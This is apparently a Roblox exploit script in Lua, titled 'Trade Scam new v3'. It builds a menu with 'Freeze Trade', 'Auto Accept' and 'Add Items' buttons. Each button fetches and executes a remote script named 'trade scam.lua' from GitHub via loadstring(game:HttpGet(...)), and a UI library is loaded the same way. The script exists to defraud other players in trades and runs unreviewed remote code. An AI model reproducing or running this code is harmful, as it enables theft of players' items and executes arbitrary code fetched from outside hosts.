loadstring(game:HttpGet(("https://raw.githubusercontent.com/daucobonhi/Ui-Redz-V2/refs/heads/main/UiREDzV2.lua")))()

       local Window = MakeWindow({
         Hub = {
         Title = "Trade Scam new v3",
         Animation = "Script Trade scam new"
         },
        Key = {
        KeySystem = false,
        Title = "Key System",
        Description = "",
        KeyLink = "",
        Keys = {"1234"},
        Notifi = {
        Notifications = true,
        CorrectKey = "Running the Script...",
       Incorrectkey = "The key is incorrect",
       CopyKeyLink = "Copied to Clipboard"
      }
    }
  })

       MinimizeButton({
       Image = "http://www.roblox.com/asset/?id=128933802535491",
       Size = {60, 60},
       Color = Color3.fromRGB(10, 10, 10),
       Corner = true,
       Stroke = false,
       StrokeColor = Color3.fromRGB(255, 0, 0)
      })
      
------ Tab
     local Tab1o = MakeTab({Name = "MAIN"})
------- BUTTON
    
    AddButton(Tab1o, {
     Name = "Freeze Trade",
    Callback = function()
	  loadstring(game:HttpGet("https://raw.githubusercontent.com/Taimugau/tradescam/refs/heads/main/trade%20scam.lua"))()
  end
  })
     AddButton(Tab1o, {
     Name = "Auto Accept",
    Callback = function()
	  loadstring(game:HttpGet("https://raw.githubusercontent.com/Taimugau/tradescam/refs/heads/main/trade%20scam.lua"))()
  end
  })   AddButton(Tab1o, {
     Name = "Aoto Add Items",
    Callback = function()
	  loadstring(game:HttpGet("https://raw.githubusercontent.com/Taimugau/tradescam/refs/heads/main/trade%20scam.lua"))()
  end
  })
